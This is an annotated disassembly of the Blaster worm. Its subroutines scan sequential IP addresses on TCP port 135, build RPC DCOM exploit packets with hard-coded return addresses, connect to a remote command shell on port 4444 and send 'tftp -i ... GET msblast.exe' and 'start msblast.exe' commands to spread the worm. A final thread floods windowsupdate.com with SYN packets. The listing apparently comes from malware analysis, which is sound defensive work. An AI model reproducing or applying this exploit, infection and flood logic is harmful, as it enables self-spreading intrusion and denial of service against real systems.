.text:00401748 cmp ds:octet2, 0FEh ; stop if octet2 is now in range [0-254] .text:00401752 jle short locret_401776 ; return .text:00401754 and ds:octet2, 0 ; 2nd octet rolls over to 0; increment 1st octet .text:0040175B inc ds:octet1 .text:00401761 cmp ds:octet1, 0FEh ; keep 1st octet if now in range [0-254]; .text:0040176B jle short loc_401774 ; increment 4th octet again so addr is never x.0.0.0 .text:0040176D and ds:octet1, 0 ; otherwise, 1st octet rolls over to 0 .text:00401774 .text:00401774 loc_401774: ; CODE XREF: incrementOctets+5F^j .text:00401774 jmp short incrementOctets ; increment 4th octet again so addr is never x.0.0.0 .text:00401776 ; --------------------------------------------------------------------------- .text:00401776 .text:00401776 locret_401776: ; CODE XREF: incrementOctets+21^j .text:00401776 ; incrementOctets+2D^j ... .text:00401776 retn ; return .text:00401776 incrementOctets endp .text:00401776 .text:00401777 .text:00401777 ; =============== S U B R O U T I N E ======================================= .text:00401777 .text:00401777 ; Attributes: bp-based frame .text:00401777 .text:00401777 infect20Hosts proc near ; CODE XREF: WinMain+312^p .text:00401777 .text:00401777 var_18C = dword ptr -18Ch .text:00401777 writefds = fd_set ptr -188h .text:00401777 var_84 = byte ptr -84h .text:00401777 in = in_addr ptr -80h .text:00401777 namelen = dword ptr -74h .text:00401777 argp = dword ptr -70h .text:00401777 name = sockaddr ptr -6Ch .text:00401777 timeout = timeval ptr -5Ch .text:00401777 var_54 = dword ptr -54h .text:00401777 s = dword ptr -50h .text:00401777 .text:00401777 push ebp .text:00401778 mov ebp, esp .text:0040177A sub esp, 18Ch .text:00401780 push ebx .text:00401781 push esi .text:00401782 push edi .text:00401783 mov [ebp+argp], 1 ; set argp for ioctlsocket() to 1 (on) .text:0040178A push 10h .text:0040178C push 0 .text:0040178E lea eax, [ebp+name] .text:00401791 push eax .text:00401792 call memset .text:00401797 add esp, 0Ch 
.text:0040179A mov [ebp+name.sa_family], 2 ; AF_INET .text:004017A0 push 87h ; hostshort = port TCP/135 .text:004017A5 call htons .text:004017AA mov esi, eax .text:004017AC mov word ptr [ebp+name.sa_data], si .text:004017B0 xor edi, edi .text:004017B2 .text:004017B2 Create 20 non-blocking TCP/IP sockets .text:004017B2 .text:004017B2 loc_4017B2: ; CODE XREF: infect20Hosts+6Bvj .text:004017B2 push 0 ; protocol = IPPROTO_IP .text:004017B4 push 1 ; type = SOCK_STREAM .text:004017B6 push 2 ; af = AF_INET .text:004017B8 call socket .text:004017BD mov [ebp+edi*4+s], eax .text:004017C1 cmp [ebp+edi*4+s], 0FFFFFFFFh .text:004017C6 jz loc_401924 ; return .text:004017CC lea eax, [ebp+argp] .text:004017CF push eax ; argp = 1 (on) .text:004017D0 push 8004667Eh ; cmd = FIONBIO .text:004017D5 push [ebp+edi*4+s] ; s[EDI] .text:004017D9 call ioctlsocket .text:004017DE inc edi .text:004017DF cmp edi, 14h .text:004017E2 jl short loc_4017B2 ; loop 20 times .text:004017E4 xor edi, edi .text:004017E6 .text:004017E6 Try to connect sockets to port TCP/135 on 20 sequential IP addresses .text:004017E6 .text:004017E6 loc_4017E6: ; CODE XREF: infect20Hosts+CDvj .text:004017E6 call incrementOctets ; connect loop -- executed 20 times .text:004017EB push ds:octet4 .text:004017F1 push ds:octet3 .text:004017F7 push ds:octet2 .text:004017FD push ds:octet1 .text:00401803 push offset aI_I_I_I ; "%i.%i.%i.%i" .text:00401808 push offset cp .text:0040180D call sprintf ; convert four octets into a string .text:00401812 add esp, 18h .text:00401815 push offset cp ; cp .text:0040181A call inet_addr ; now convert string into DWORD .text:0040181F mov [ebp+var_54], eax .text:00401822 cmp eax, 0FFFFFFFFh .text:00401825 jz loc_401924 ; return .text:0040182B mov eax, [ebp+var_54] .text:0040182E mov dword ptr [ebp+name.sa_data+2], eax .text:00401831 push 10h ; namelen .text:00401833 lea eax, [ebp+name] .text:00401836 push eax ; name .text:00401837 push [ebp+edi*4+s] ; s[EDI] .text:0040183B call connect 
.text:00401840 inc edi .text:00401841 cmp edi, 14h .text:00401844 jl short loc_4017E6 ; connect loop -- executed 20 times .text:00401846 push 708h ; dwMilliseconds .text:0040184B call Sleep ; wait 1.8 seconds .text:00401850 xor edi, edi .text:00401852 .text:00401852 Look for connected sockets by doing a select() on each s[EDI] (EDI=0..19) .text:00401852 .text:00401852 loc_401852: ; CODE XREF: infect20Hosts+1A7vj .text:00401852 and [ebp+timeout.tv_sec], 0 .text:00401856 and [ebp+timeout.tv_usec], 0 ; zero out timeval struct .text:00401856 ; (timeout of 0 = return instantly) .text:0040185A and [ebp+writefds.fd_count], 0 ; FD_ZERO(&writefds) .text:00401861 .text:00401861 --- start of FD_SET macro code .text:00401861 .text:00401861 and [ebp+var_18C], 0 ; FD_SET(s[EDI], &writefds) .text:00401868 jmp short loc_401883 .text:0040186A ; --------------------------------------------------------------------------- .text:0040186A .text:0040186A loc_40186A: ; CODE XREF: infect20Hosts+118vj .text:0040186A mov esi, [ebp+var_18C] .text:00401870 mov ebx, [ebp+edi*4+s] ; EDI = index into s[] socket array .text:00401870 ; EBX = socket s[EDI] .text:00401874 cmp [ebp+esi*4+writefds.fd_array], ebx .text:0040187B jz short loc_401891 .text:0040187D inc [ebp+var_18C] .text:00401883 .text:00401883 loc_401883: ; CODE XREF: infect20Hosts+F1^j .text:00401883 mov eax, [ebp+writefds.fd_count] .text:00401889 cmp [ebp+var_18C], eax .text:0040188F jb short loc_40186A .text:00401891 .text:00401891 loc_401891: ; CODE XREF: infect20Hosts+104^j .text:00401891 mov eax, [ebp+writefds.fd_count] .text:00401897 cmp [ebp+var_18C], eax .text:0040189D jnz short loc_4018BB .text:0040189F cmp eax, 40h .text:004018A2 jnb short loc_4018BB .text:004018A4 mov esi, [ebp+var_18C] .text:004018AA mov ebx, [ebp+edi*4+s] .text:004018AE mov [ebp+esi*4+writefds.fd_array], ebx .text:004018B5 inc [ebp+writefds.fd_count] .text:004018B5 .text:004018B5 --- end of FD_SET macro code .text:004018BB .text:004018BB loc_4018BB: ; CODE 
XREF: infect20Hosts+126^j .text:004018BB ; infect20Hosts+12B^j .text:004018BB lea eax, [ebp+timeout] .text:004018BE push eax ; timeout .text:004018BF push 0 ; exceptfds .text:004018C1 lea eax, [ebp+writefds] .text:004018C7 push eax ; writefds .text:004018C8 push 0 ; readfds .text:004018CA push 0 ; nfds .text:004018CC call select ; writefds will be list of connected sockets .text:004018D1 cmp eax, 1 .text:004018D4 jge short loc_4018E1 ; did select() succeed? .text:004018D6 push [ebp+edi*4+s] ; s .text:004018DA call closesocket ; close socket s[EDI] if select() failed .text:004018DF jmp short loc_40191A ; advance to next iteration of loop .text:004018E1 ; --------------------------------------------------------------------------- .text:004018E1 .text:004018E1 loc_4018E1: ; CODE XREF: infect20Hosts+15D^j .text:004018E1 mov [ebp+namelen], 10h .text:004018E8 lea eax, [ebp+namelen] .text:004018EB push eax ; namelen .text:004018EC lea eax, [ebp+var_84] .text:004018F2 push eax ; name .text:004018F3 push [ebp+edi*4+s] ; s .text:004018F7 call getpeername .text:004018FC push dword ptr [ebp+in.S_un] ; in .text:004018FF call inet_ntoa .text:00401904 push eax ; szIPAddr: string representation of IP address to infect .text:00401905 push [ebp+edi*4+s] ; s: socket connected to remote TCP/135 .text:00401909 call infectTarget ; infect a single host by sending command .text:00401909 ; shell exploit and issuing command to .text:00401909 ; download worm executable via TFTP .text:0040190E add esp, 8 .text:00401911 push [ebp+edi*4+s] ; s .text:00401915 call closesocket ; close TCP/135 socket .text:0040191A .text:0040191A loc_40191A: ; CODE XREF: infect20Hosts+168^j .text:0040191A inc edi .text:0040191B cmp edi, 14h .text:0040191E jl loc_401852 ; check each of the 20 sockets in array for connection .text:00401924 .text:00401924 loc_401924: ; CODE XREF: infect20Hosts+4F^j .text:00401924 ; infect20Hosts+AE^j .text:00401924 pop edi ; return .text:00401925 pop esi .text:00401926 pop ebx 
.text:00401927 leave .text:00401928 retn .text:00401928 infect20Hosts endp .text:00401928 .text:00401929 .text:00401929 ; =============== S U B R O U T I N E ======================================= .text:00401929 .text:00401929 ; Attributes: bp-based frame .text:00401929 .text:00401929 ; int __cdecl infectTarget(SOCKET s,char *szIPAddr) .text:00401929 infectTarget proc near ; CODE XREF: infect20Hosts+192^p .text:00401929 .text:00401929 ThreadId = dword ptr -1934h .text:00401929 var_1930 = dword ptr -1930h .text:00401929 namelen = dword ptr -192Ch .text:00401929 var_1928 = byte ptr -1928h .text:00401929 var_18F8 = byte ptr -18F8h .text:00401929 var_18BC = byte ptr -18BCh .text:00401929 buf = byte ptr -155Ch .text:00401929 var_1514 = dword ptr -1514h .text:00401929 argp = dword ptr -1510h .text:00401929 var_150C = byte ptr -150Ch .text:00401929 var_14E8 = byte ptr -14E8h .text:00401929 hObject = dword ptr -1240h .text:00401929 var_123C = dword ptr -123Ch .text:00401929 name = sockaddr ptr -1238h .text:00401929 var_1228 = byte ptr -1228h .text:00401929 var_1224 = byte ptr -1224h .text:00401929 var_1223 = byte ptr -1223h .text:00401929 var_1222 = byte ptr -1222h .text:00401929 var_1221 = byte ptr -1221h .text:00401929 var_1218 = dword ptr -1218h .text:00401929 var_1210 = dword ptr -1210h .text:00401929 var_1208 = dword ptr -1208h .text:00401929 var_1204 = byte ptr -1204h .text:00401929 len = dword ptr -1004h .text:00401929 var_1000 = byte ptr -1000h .text:00401929 var_FF8 = dword ptr -0FF8h .text:00401929 var_FF0 = dword ptr -0FF0h .text:00401929 var_F80 = dword ptr -0F80h .text:00401929 var_F7C = dword ptr -0F7Ch .text:00401929 var_F4C = dword ptr -0F4Ch .text:00401929 var_F48 = dword ptr -0F48h .text:00401929 var_F30 = dword ptr -0F30h .text:00401929 var_E74 = dword ptr -0E74h .text:00401929 s = dword ptr 8 .text:00401929 szIPAddr = dword ptr 0Ch .text:00401929 .text:00401929 push ebp ; flags .text:0040192A mov ebp, esp .text:0040192C mov eax, 2934h .text:00401931 
call allocstackspace ; used when > 4KB stack space needed .text:00401936 push ebx ; len .text:00401937 push esi ; buf .text:00401938 push edi ; s .text:00401939 and [ebp+argp], 0 ; set argp for ioctlsocket() to 0 (off) .text:00401940 lea eax, [ebp+argp] .text:00401946 push eax ; argp = 0 (off) .text:00401947 push 8004667Eh ; cmd = FIONBIO .text:0040194C push [ebp+s] ; s .text:0040194F call ioctlsocket ; make sure socket does blocking I/O .text:00401954 cmp ds:dwWhichRetAddr, 1 ; 80% chance set to 1 (XP), 20% set to 2 (2000) .text:0040195B jnz short loc_401969 ; 2000 "universal" return address (20% probability) .text:0040195B ; 0018759Fh is a "CALL EBX" in unicode.nls .text:0040195D .text:0040195D Assemble RPC DCOM exploit packets .text:0040195D .text:0040195D mov [ebp+var_1514], 100139Dh ; XP "universal" return address (80% probability) .text:0040195D ; 0100139Dh is a "CALL EBX" in svchost.exe .text:00401967 jmp short loc_401973 .text:00401969 ; --------------------------------------------------------------------------- .text:00401969 .text:00401969 loc_401969: ; CODE XREF: infectTarget+32^j .text:00401969 mov [ebp+var_1514], 18759Fh ; 2000 "universal" return address (20% probability) .text:00401969 ; 0018759Fh is a "CALL EBX" in unicode.nls .text:00401973 .text:00401973 loc_401973: ; CODE XREF: infectTarget+3E^j .text:00401973 lea edi, [ebp+buf] .text:00401979 lea esi, ds:4040C0h ; bindstr[] .text:0040197F mov ecx, 12h ; size = 0048h (72) .text:00401984 rep movsd .text:00401986 lea edi, [ebp+var_18BC] .text:0040198C lea esi, ds:404108h ; request1[] .text:00401992 mov ecx, 0D8h ; size = 0360h (864) .text:00401997 rep movsd .text:00401999 lea edi, [ebp+var_1218] .text:0040199F lea esi, ds:404468h ; request2[] .text:004019A5 mov ecx, 4 ; size = 0010h (16) .text:004019AA rep movsd .text:004019AC lea edi, [ebp+var_18F8] .text:004019B2 lea esi, ds:404478h ; request3[] .text:004019B8 mov ecx, 0Fh ; size = 003Ch (60) .text:004019BD rep movsd .text:004019BF lea edi, 
[ebp+var_150C] .text:004019C5 lea esi, ds:4044B4h ; sc .text:004019CB mov ecx, 0B3h ; size = 02CCh (716) .text:004019D0 rep movsd .text:004019D2 lea edi, [ebp+var_1928] .text:004019D8 lea esi, ds:404780h ; request4[] .text:004019DE mov ecx, 0Ch ; size = 0030h (48) .text:004019E3 rep movsd .text:004019E5 push 4 .text:004019E7 lea eax, [ebp+var_1514] .text:004019ED push eax .text:004019EE lea eax, [ebp+var_14E8] .text:004019F4 push eax .text:004019F5 call memcpy .text:004019FA mov [ebp+var_1930], 2CCh .text:00401A04 push 360h .text:00401A09 lea eax, [ebp+var_18BC] .text:00401A0F push eax .text:00401A10 lea eax, [ebp+var_1000] .text:00401A16 push eax .text:00401A17 call memcpy .text:00401A1C mov [ebp+len], 360h .text:00401A26 add [ebp+var_1218], 166h .text:00401A30 mov eax, [ebp+var_1210] .text:00401A36 add eax, 166h .text:00401A3B mov [ebp+var_1210], eax .text:00401A41 push 10h .text:00401A43 lea eax, [ebp+var_1218] .text:00401A49 push eax .text:00401A4A lea eax, [ebp+var_1000] .text:00401A50 add eax, 360h .text:00401A55 push eax .text:00401A56 call memcpy .text:00401A5B mov [ebp+len], 370h .text:00401A65 push 2CCh .text:00401A6A lea eax, [ebp+var_150C] .text:00401A70 push eax .text:00401A71 lea eax, [ebp+var_1000] .text:00401A77 add eax, 370h .text:00401A7C push eax .text:00401A7D call memcpy .text:00401A82 mov [ebp+len], 63Ch .text:00401A8C push 3Ch .text:00401A8E lea eax, [ebp+var_18F8] .text:00401A94 push eax .text:00401A95 lea eax, [ebp+var_1000] .text:00401A9B add eax, 63Ch .text:00401AA0 push eax .text:00401AA1 call memcpy .text:00401AA6 mov [ebp+len], 678h .text:00401AB0 push 30h .text:00401AB2 lea eax, [ebp+var_1928] .text:00401AB8 push eax .text:00401AB9 lea eax, [ebp+var_1000] .text:00401ABF add eax, 678h .text:00401AC4 push eax .text:00401AC5 call memcpy .text:00401ACA add esp, 48h .text:00401ACD mov [ebp+len], 6A8h .text:00401AD7 mov eax, [ebp+var_FF8] .text:00401ADD add eax, 2C0h .text:00401AE2 mov [ebp+var_FF8], eax .text:00401AE8 mov eax, 
[ebp+var_FF0] .text:00401AEE add eax, 2C0h .text:00401AF3 mov [ebp+var_FF0], eax .text:00401AF9 mov eax, [ebp+var_F80] .text:00401AFF add eax, 2C0h .text:00401B04 mov [ebp+var_F80], eax .text:00401B0A mov eax, [ebp+var_F7C] .text:00401B10 add eax, 2C0h .text:00401B15 mov [ebp+var_F7C], eax .text:00401B1B mov eax, [ebp+var_F4C] .text:00401B21 add eax, 2C0h .text:00401B26 mov [ebp+var_F4C], eax .text:00401B2C mov eax, [ebp+var_F48] .text:00401B32 add eax, 2C0h .text:00401B37 mov [ebp+var_F48], eax .text:00401B3D mov eax, [ebp+var_F30] .text:00401B43 add eax, 2C0h .text:00401B48 mov [ebp+var_F30], eax .text:00401B4E mov eax, [ebp+var_E74] .text:00401B54 add eax, 2C0h .text:00401B59 mov [ebp+var_E74], eax .text:00401B5F push 0 ; flags .text:00401B61 push 48h ; len .text:00401B63 lea eax, [ebp+buf] .text:00401B69 push eax ; buf .text:00401B6A push [ebp+s] ; s .text:00401B6D call send ; send RPC bind packet (bindstr[]) .text:00401B72 cmp eax, 0FFFFFFFFh .text:00401B75 jz loc_401E3B ; return .text:00401B7B push 0 ; flags .text:00401B7D push [ebp+len] ; len .text:00401B83 lea eax, [ebp+var_1000] .text:00401B89 push eax ; buf .text:00401B8A push [ebp+s] ; s .text:00401B8D call send ; send assembled DCOM REMACT exploit packet .text:00401B92 cmp eax, 0FFFFFFFFh .text:00401B95 jz loc_401E3B ; return .text:00401B9B push [ebp+s] ; s .text:00401B9E call closesocket ; close TCP/135 socket .text:00401BA3 push 190h ; dwMilliseconds .text:00401BA8 call Sleep ; sleep for 0.4 seconds .text:00401BAD .text:00401BAD Connect to remote command shell .text:00401BAD .text:00401BAD push 0 ; protocol = IPPROTO_TCP .text:00401BAF push 1 ; type = SOCK_STREAM .text:00401BB1 push 2 ; af = AF_INET .text:00401BB3 call socket ; create new TCP/IP socket for connecting to command shell .text:00401BB8 mov [ebp+var_1208], eax .text:00401BBE cmp eax, 0FFFFFFFFh .text:00401BC1 jz loc_401E3B ; return .text:00401BC7 push 10h .text:00401BC9 push 0 .text:00401BCB lea eax, [ebp+name] .text:00401BD1 push eax 
.text:00401BD2 call memset .text:00401BD7 add esp, 0Ch .text:00401BDA mov [ebp+name.sa_family], 2 .text:00401BE3 push 115Ch ; hostshort = 4444 .text:00401BE8 call htons .text:00401BED mov edi, eax .text:00401BEF mov word ptr [ebp+name.sa_data], di .text:00401BF6 push [ebp+szIPAddr] ; cp .text:00401BF9 call inet_addr .text:00401BFE mov [ebp+var_123C], eax .text:00401C04 cmp eax, 0FFFFFFFFh .text:00401C07 jz loc_401E3B ; return .text:00401C0D mov eax, [ebp+var_123C] .text:00401C13 mov dword ptr [ebp+name.sa_data+2], eax .text:00401C19 push 10h ; namelen .text:00401C1B lea eax, [ebp+name] .text:00401C21 push eax ; name .text:00401C22 push [ebp+var_1208] ; s .text:00401C28 call connect ; attempt to connect to command shell on port TCP/4444 .text:00401C2D cmp eax, 0FFFFFFFFh .text:00401C30 jz loc_401E3B ; return .text:00401C36 .text:00401C36 Start TFTP server thread and send TFTP command .text:00401C36 .text:00401C36 push 10h .text:00401C38 push 0 .text:00401C3A push offset cp .text:00401C3F call memset .text:00401C44 mov [ebp+namelen], 10h .text:00401C4E push 10h .text:00401C50 push 0 .text:00401C52 lea eax, [ebp+var_1228] .text:00401C58 push eax .text:00401C59 call memset .text:00401C5E lea eax, [ebp+namelen] .text:00401C64 push eax ; namelen .text:00401C65 lea eax, [ebp+var_1228] .text:00401C6B push eax ; name .text:00401C6C push [ebp+var_1208] ; s .text:00401C72 call getsockname .text:00401C77 movzx eax, [ebp+var_1221] .text:00401C7E push eax .text:00401C7F movzx eax, [ebp+var_1222] .text:00401C86 push eax .text:00401C87 movzx eax, [ebp+var_1223] .text:00401C8E push eax .text:00401C8F movzx eax, [ebp+var_1224] .text:00401C96 push eax .text:00401C97 push offset aD_D_D_D ; "%d.%d.%d.%d" .text:00401C9C push offset cp .text:00401CA1 call sprintf .text:00401CA6 add esp, 30h .text:00401CA9 cmp ds:s, 0 .text:00401CB0 jz short loc_401CBD .text:00401CB2 push ds:s ; s .text:00401CB8 call closesocket .text:00401CBD .text:00401CBD loc_401CBD: ; CODE XREF: infectTarget+387^j 
.text:00401CBD lea eax, [ebp+ThreadId] .text:00401CC3 push eax ; lpThreadId .text:00401CC4 push 0 ; dwCreationFlags .text:00401CC6 push 0 ; lpParameter .text:00401CC8 push offset TFTPServerThread ; lpStartAddress .text:00401CCD push 0 ; dwStackSize .text:00401CCF push 0 ; lpThreadAttributes .text:00401CD1 call CreateThread .text:00401CD6 mov [ebp+hObject], eax .text:00401CDC push 50h ; dwMilliseconds .text:00401CDE call Sleep ; sleep for 80ms .text:00401CE3 push offset aMsblast_exe ; "msblast.exe" .text:00401CE8 push offset cp .text:00401CED push offset aTftpISGetS ; "tftp -i %s GET %s\n" .text:00401CF2 lea eax, [ebp+var_1204] .text:00401CF8 push eax .text:00401CF9 call sprintf ; create command string for downloading worm exe via TFTP .text:00401CFE add esp, 10h .text:00401D01 lea ecx, [ebp+var_1204] .text:00401D07 or eax, 0FFFFFFFFh .text:00401D0A .text:00401D0A loc_401D0A: ; CODE XREF: infectTarget+3E6vj .text:00401D0A inc eax .text:00401D0B cmp byte ptr [ecx+eax], 0 .text:00401D0F jnz short loc_401D0A .text:00401D11 push 0 ; flags .text:00401D13 push eax ; len .text:00401D14 lea eax, [ebp+var_1204] .text:00401D1A push eax ; buf .text:00401D1B push [ebp+var_1208] ; s .text:00401D21 call send ; send "tftp -i GET msblast.exe " command .text:00401D26 cmp eax, 1 .text:00401D29 jl loc_401DEB .text:00401D2F push 3E8h ; dwMilliseconds .text:00401D34 call Sleep ; sleep for 1 second .text:00401D39 xor ebx, ebx .text:00401D3B jmp short loc_401D48 .text:00401D3D ; --------------------------------------------------------------------------- .text:00401D3D .text:00401D3D loc_401D3D: ; CODE XREF: infectTarget+42Bvj .text:00401D3D push 7D0h ; dwMilliseconds .text:00401D42 call Sleep ; sleep for 2 seconds .text:00401D47 inc ebx .text:00401D48 .text:00401D48 loc_401D48: ; CODE XREF: infectTarget+412^j .text:00401D48 cmp ebx, 0Ah .text:00401D4B jge short loc_401D56 .text:00401D4D cmp dwTFTPInProgress, 0 ; is TFTP transfer finished? 
.text:00401D54 jnz short loc_401D3D ; loop up to 10 times waiting for TFTP server to finish .text:00401D56 .text:00401D56 loc_401D56: ; CODE XREF: infectTarget+422^j .text:00401D56 push offset aMsblast_exe ; "msblast.exe" .text:00401D5B push offset aStartS ; "start %s\n" .text:00401D60 lea eax, [ebp+var_1204] .text:00401D66 push eax .text:00401D67 call sprintf ; create command string .text:00401D6C add esp, 0Ch .text:00401D6F lea ecx, [ebp+var_1204] .text:00401D75 or eax, 0FFFFFFFFh .text:00401D78 .text:00401D78 loc_401D78: ; CODE XREF: infectTarget+454vj .text:00401D78 inc eax .text:00401D79 cmp byte ptr [ecx+eax], 0 .text:00401D7D jnz short loc_401D78 .text:00401D7F push 0 ; flags .text:00401D81 push eax ; len .text:00401D82 lea eax, [ebp+var_1204] .text:00401D88 push eax ; buf .text:00401D89 push [ebp+var_1208] ; s .text:00401D8F call send ; send "start msblast.exe " command .text:00401D94 cmp eax, 1 .text:00401D97 jl short loc_401DEB .text:00401D99 push 7D0h ; dwMilliseconds .text:00401D9E call Sleep ; sleep two seconds .text:00401DA3 push offset aMsblast_exe ; "msblast.exe" .text:00401DA8 push offset aS_0 ; "%s\n" .text:00401DAD lea eax, [ebp+var_1204] .text:00401DB3 push eax .text:00401DB4 call sprintf ; create command string .text:00401DB9 add esp, 0Ch .text:00401DBC lea ecx, [ebp+var_1204] .text:00401DC2 or eax, 0FFFFFFFFh .text:00401DC5 .text:00401DC5 loc_401DC5: ; CODE XREF: infectTarget+4A1vj .text:00401DC5 inc eax .text:00401DC6 cmp byte ptr [ecx+eax], 0 .text:00401DCA jnz short loc_401DC5 .text:00401DCC push 0 ; flags .text:00401DCE push eax ; len .text:00401DCF lea eax, [ebp+var_1204] .text:00401DD5 push eax ; buf .text:00401DD6 push [ebp+var_1208] ; s .text:00401DDC call send ; now send "msblast.exe " command .text:00401DE1 push 7D0h ; dwMilliseconds .text:00401DE6 call Sleep ; sleep for 2 seconds .text:00401DEB .text:00401DEB loc_401DEB: ; CODE XREF: infectTarget+400^j .text:00401DEB ; infectTarget+46E^j .text:00401DEB cmp [ebp+var_1208], 0 
.text:00401DF2 jz short loc_401DFF .text:00401DF4 push [ebp+var_1208] ; s .text:00401DFA call closesocket .text:00401DFF .text:00401DFF loc_401DFF: ; CODE XREF: infectTarget+4C9^j .text:00401DFF cmp dwTFTPInProgress, 0 .text:00401E06 jz short loc_401E27 .text:00401E08 push 0 ; dwExitCode .text:00401E0A push [ebp+hObject] ; hThread .text:00401E10 call TerminateThread ; kill TFTP server thread if it's not done already .text:00401E15 push ds:s ; s .text:00401E1B call closesocket .text:00401E20 and dwTFTPInProgress, 0 .text:00401E27 .text:00401E27 loc_401E27: ; CODE XREF: infectTarget+4DD^j .text:00401E27 cmp [ebp+hObject], 0 .text:00401E2E jz short loc_401E3B ; return .text:00401E30 push [ebp+hObject] ; hObject .text:00401E36 call CloseHandle ; close handle to TFTP server thread .text:00401E3B .text:00401E3B loc_401E3B: ; CODE XREF: infectTarget+24C^j .text:00401E3B ; infectTarget+26C^j ... .text:00401E3B pop edi ; return .text:00401E3C pop esi .text:00401E3D pop ebx .text:00401E3E leave .text:00401E3F retn .text:00401E3F infectTarget endp .text:00401E3F .text:00401E40 .text:00401E40 ; =============== S U B R O U T I N E ======================================= .text:00401E40 .text:00401E40 .text:00401E40 computeChecksum proc near ; CODE XREF: sendTCP80SYN+1AEvp .text:00401E40 ; sendTCP80SYN+1EAvp .text:00401E40 .text:00401E40 lpData = dword ptr 8 .text:00401E40 dwLength = dword ptr 0Ch .text:00401E40 .text:00401E40 push ebx .text:00401E41 mov ebx, [esp+lpData] .text:00401E45 mov ecx, [esp+dwLength] .text:00401E49 xor edx, edx .text:00401E4B jmp short loc_401E5A .text:00401E4D ; --------------------------------------------------------------------------- .text:00401E4D .text:00401E4D loc_401E4D: ; CODE XREF: computeChecksum+1Dvj .text:00401E4D mov eax, ebx .text:00401E4F add ebx, 2 .text:00401E52 movzx eax, word ptr [eax] .text:00401E55 add edx, eax .text:00401E57 sub ecx, 2 .text:00401E5A .text:00401E5A loc_401E5A: ; CODE XREF: computeChecksum+B^j .text:00401E5A cmp 
ecx, 1 .text:00401E5D jg short loc_401E4D .text:00401E5F or ecx, ecx .text:00401E61 jz short loc_401E68 .text:00401E63 movzx eax, byte ptr [ebx] .text:00401E66 add edx, eax .text:00401E68 .text:00401E68 loc_401E68: ; CODE XREF: computeChecksum+21^j .text:00401E68 mov ecx, edx .text:00401E6A shr ecx, 10h .text:00401E6D mov ebx, edx .text:00401E6F and ebx, 0FFFFh .text:00401E75 mov edx, ecx .text:00401E77 add edx, ebx .text:00401E79 mov ecx, edx .text:00401E7B shr ecx, 10h .text:00401E7E add edx, ecx .text:00401E80 mov eax, edx .text:00401E82 not eax .text:00401E84 and eax, 0FFFFh .text:00401E89 pop ebx .text:00401E8A retn .text:00401E8A computeChecksum endp .text:00401E8A .text:00401E8B .text:00401E8B ; =============== S U B R O U T I N E ======================================= .text:00401E8B .text:00401E8B ; Attributes: bp-based frame .text:00401E8B .text:00401E8B ; int __cdecl lookupIPAddr(char *name) .text:00401E8B lookupIPAddr proc near ; CODE XREF: WUSYNFloodThread+13vp .text:00401E8B ; sendTCP80SYN+7Evp .text:00401E8B .text:00401E8B name = dword ptr 8 .text:00401E8B .text:00401E8B push ebp .text:00401E8C mov ebp, esp .text:00401E8E push esi .text:00401E8F push edi .text:00401E90 push [ebp+name] ; cp .text:00401E93 call inet_addr .text:00401E98 mov edi, eax .text:00401E9A xor esi, esi .text:00401E9C cmp edi, 0FFFFFFFFh .text:00401E9F jnz short loc_401EBB .text:00401EA1 push [ebp+name] ; name .text:00401EA4 call gethostbyname .text:00401EA9 mov esi, eax .text:00401EAB or esi, esi .text:00401EAD jnz short loc_401EB4 .text:00401EAF or eax, 0FFFFFFFFh .text:00401EB2 jmp short loc_401EBD .text:00401EB4 ; --------------------------------------------------------------------------- .text:00401EB4 .text:00401EB4 loc_401EB4: ; CODE XREF: lookupIPAddr+22^j .text:00401EB4 mov eax, [esi+0Ch] .text:00401EB7 mov eax, [eax] .text:00401EB9 mov edi, [eax] .text:00401EBB .text:00401EBB loc_401EBB: ; CODE XREF: lookupIPAddr+14^j .text:00401EBB mov eax, edi .text:00401EBD 
.text:00401EBD loc_401EBD: ; CODE XREF: lookupIPAddr+27^j .text:00401EBD pop edi .text:00401EBE pop esi .text:00401EBF pop ebp .text:00401EC0 retn .text:00401EC0 lookupIPAddr endp .text:00401EC0 .text:00401EC1 .text:00401EC1 ; =============== S U B R O U T I N E ======================================= .text:00401EC1 .text:00401EC1 ; Attributes: bp-based frame .text:00401EC1 .text:00401EC1 ; DWORD __stdcall WUSYNFloodThread(LPVOID) .text:00401EC1 WUSYNFloodThread proc near ; DATA XREF: WinMain+304^o .text:00401EC1 .text:00401EC1 optval = byte ptr -4 .text:00401EC1 .text:00401EC1 push ebp .text:00401EC2 mov ebp, esp .text:00401EC4 push ecx .text:00401EC5 push ebx .text:00401EC6 push esi .text:00401EC7 push edi ; s .text:00401EC8 mov dword ptr [ebp+optval], 1 .text:00401ECF push offset aWindowsupdate_ ; name .text:00401ED4 call lookupIPAddr ; get IP address of "windowsupdate.com" .text:00401ED9 pop ecx .text:00401EDA mov esi, eax .text:00401EDC push 1 ; dwFlags .text:00401EDE push 0 ; g .text:00401EE0 push 0 ; lpProtocolInfo .text:00401EE2 push 0FFh ; protocol .text:00401EE7 push 3 ; type .text:00401EE9 push 2 ; af .text:00401EEB call WSASocketA ; create raw IP socket .text:00401EF0 mov edi, eax .text:00401EF2 cmp eax, 0FFFFFFFFh .text:00401EF5 jnz short loc_401EFB .text:00401EF7 xor eax, eax .text:00401EF9 jmp short loc_401F2F ; return 0 .text:00401EFB ; --------------------------------------------------------------------------- .text:00401EFB .text:00401EFB loc_401EFB: ; CODE XREF: WUSYNFloodThread+34^j .text:00401EFB push 4 ; optlen .text:00401EFD lea eax, [ebp+optval] .text:00401F00 push eax ; optval .text:00401F01 push 2 ; optname .text:00401F03 push 0 ; level .text:00401F05 push edi ; s .text:00401F06 call setsockopt .text:00401F0B cmp eax, 0FFFFFFFFh .text:00401F0E jnz short loc_401F14 ; raw IP socket to use .text:00401F10 xor eax, eax .text:00401F12 jmp short loc_401F2F .text:00401F14 ; 
--------------------------------------------------------------------------- .text:00401F14 .text:00401F14 loc_401F14: ; CODE XREF: WUSYNFloodThread+4D^j .text:00401F14 ; WUSYNFloodThread+64vj .text:00401F14 push edi ; raw IP socket to use .text:00401F15 push esi ; destination IP address (windowsupdate.com) .text:00401F16 call sendTCP80SYN .text:00401F1B add esp, 8 .text:00401F1E push 14h ; dwMilliseconds .text:00401F20 call Sleep ; sleep for 20ms between SYN packets .text:00401F25 jmp short loc_401F14 ; raw IP socket to use .text:00401F27 ; --------------------------------------------------------------------------- .text:00401F27 push edi .text:00401F28 call closesocket .text:00401F2D xor eax, eax .text:00401F2F .text:00401F2F loc_401F2F: ; CODE XREF: WUSYNFloodThread+38^j .text:00401F2F ; WUSYNFloodThread+51^j .text:00401F2F pop edi .text:00401F30 pop esi .text:00401F31 pop ebx .text:00401F32 leave .text:00401F33 retn 4 .text:00401F33 WUSYNFloodThread 